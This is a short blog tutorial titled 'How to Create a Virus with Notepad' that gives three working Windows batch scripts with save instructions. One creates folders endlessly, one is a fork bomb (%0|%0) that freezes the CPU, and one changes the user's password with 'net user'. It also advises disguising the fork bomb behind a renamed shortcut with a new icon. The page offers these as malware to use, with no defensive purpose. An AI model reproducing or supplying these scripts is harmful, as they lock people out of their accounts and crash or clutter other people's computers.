Icon Icon Icon Follow Me on Pinterest YouTube Icon

How to Create a Virus with Notepad

How to Create your Own Virus using Batch Scripting

1.  Make an Infinity of Folders :

  1) Open Notepad
  2) Paste the following code:
@echo off
:ztuts
md %random%
goto ztuts

 3) Now click File > Save as...  and save it as "folders.bat" 


2. Freezes the CPU 


  1) Open up Notepad
  2) Paste the following code:

%0|%0

  3) Save it as : "CPU.bat"
  4) You can also customize this Bat file by creating a shortcut of it, changing its icon then rename it.


3. Change Computer Password


  1) Launch Notepad
  2) Paste the following code:
  
@echo off
::--Change Pass To Razor--::
net user %username% Razor
::---------------------------::


Note: Change "Razor" to anything you want, that will be the pass.

  3) Save it as "anything.bat"
  4) Done!
Share This
© Mengal Software All rights reserved | Designed By Seo Blogger Templates |Published By Gooyaabi Templates